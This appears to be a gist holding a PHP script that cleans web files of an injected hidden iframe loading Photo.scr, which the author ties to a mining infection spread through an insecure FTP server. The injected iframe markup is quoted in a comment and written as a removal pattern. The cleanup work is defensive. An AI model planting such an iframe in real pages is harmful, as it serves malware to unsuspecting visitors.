Created
November 27, 2018 03:21
Somehow, hardening FTP is difficult: FileZilla FTP Server is not hardened well enough and is prone to bots injecting Photo.scr for bitcoin mining. This is a way to remove the injected iframe code.
<?php | |
/**
 * Run it as root/administrator: php cleanPhotoscrMalware.php
 * Cleans up after the stupid Photo.scr miner. For it to work, note that it searches for a CRLF
 * line ending between the two lines of the injected code.
 *
 * The real injected code looks like this:
 *
 * <iframe src=Photo.scr width=1 height=1 frameborder=0>
 * <\/iframe>
 *
 * It would be best to turn off the FTP server; even password protection does not seem to harden it enough.
 */
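// Strip the injected Photo.scr iframe from every *.php file at or below the
// current working directory.
//
// Scope, for whoever runs this during cleanup: only *.php files are scanned and
// only the iframe markup is removed. The script does not look at other file
// types, does not delete a Photo.scr file itself, and does not change how the
// files came to be modified (the FTP server noted in the header).
//
// Photo\.scr: the dot is escaped so only the literal file name matches.
// \r?\n: accepts the CRLF ending the header describes as well as a bare LF, so
// the match no longer depends on how this script itself was saved.
$iframePattern = '/<iframe src=Photo\.scr width=1 height=1 frameborder=0>\r?\n<\/iframe>/';

foreach (rglob("*.php") as $virusFile) {
    // A directory can also be named "*.php"; only regular files are rewritten.
    if (!is_file($virusFile)) {
        continue;
    }

    $withVirus = file_get_contents($virusFile);
    if ($withVirus === false) {
        // Never fall through on a failed read: writing back the result of a
        // failed read would replace the file with an empty string.
        error_log("cleanPhotoscrMalware: cannot read {$virusFile}, skipped");
        continue;
    }

    $removed = 0;
    $withoutVirus = preg_replace($iframePattern, '', $withVirus, -1, $removed);
    if ($withoutVirus === null) {
        // preg_replace() returns null on a PCRE error; leave the file as it is.
        error_log("cleanPhotoscrMalware: pattern error on {$virusFile}, skipped");
        continue;
    }

    // Untouched files are not rewritten, so their modification times stay
    // usable as evidence of when the injection happened.
    if ($removed === 0) {
        continue;
    }

    if (file_put_contents($virusFile, $withoutVirus) === false) {
        error_log("cleanPhotoscrMalware: cannot write {$virusFile}");
        continue;
    }

    // Keep a record of every file that was actually modified.
    echo "cleaned {$removed} iframe(s): {$virusFile}", PHP_EOL;
}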
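/**
 * Recursively collect paths matching a glob pattern.
 *
 * The directory part of $pattern is the starting directory; the basename
 * (for example "*.php") is applied again in every subdirectory found below it.
 *
 * NOTE(review): glob()'s "*" normally does not match names that begin with a
 * dot, so dot-directories are presumably not descended into -- confirm if the
 * tree being scanned has any.
 *
 * @param string $pattern Glob pattern, e.g. "*.php" or "/var/www/*.php".
 * @param int    $flags   Flags passed to glob() for the file match.
 * @return array Matching paths, this directory's matches first; empty when nothing matches.
 */
function glob_recursive($pattern, $flags = 0){
    // glob() can return false on error; normalise to an array so the merge
    // and the loop below never receive a boolean.
    $matches = glob($pattern, $flags) ?: [];
    $subdirs = glob(dirname($pattern).'/*', GLOB_ONLYDIR|GLOB_NOSORT) ?: [];

    $name = basename($pattern);
    $parts = [$matches];
    foreach ($subdirs as $dir) {
        $parts[] = glob_recursive($dir.'/'.$name, $flags);
    }

    // One merge at the end instead of re-copying the growing list per directory.
    return array_merge(...$parts);
}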
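/**
 * Recursive glob: returns the paths matching $pattern in its directory and in
 * every subdirectory below it.
 *
 * The original body repeated glob_recursive() line for line and already called
 * it for each subdirectory, so this now delegates to it directly.
 *
 * @param string $pattern Glob pattern, e.g. "*.php".
 * @param int    $flags   Flags passed to glob() for the file match.
 * @return array Matching paths as returned by glob_recursive().
 */
function rglob($pattern, $flags = 0){
    // forked from https://github.com/rodurma/PHP-Functions/blob/master/glob_recursive.php
    return glob_recursive($pattern, $flags);
}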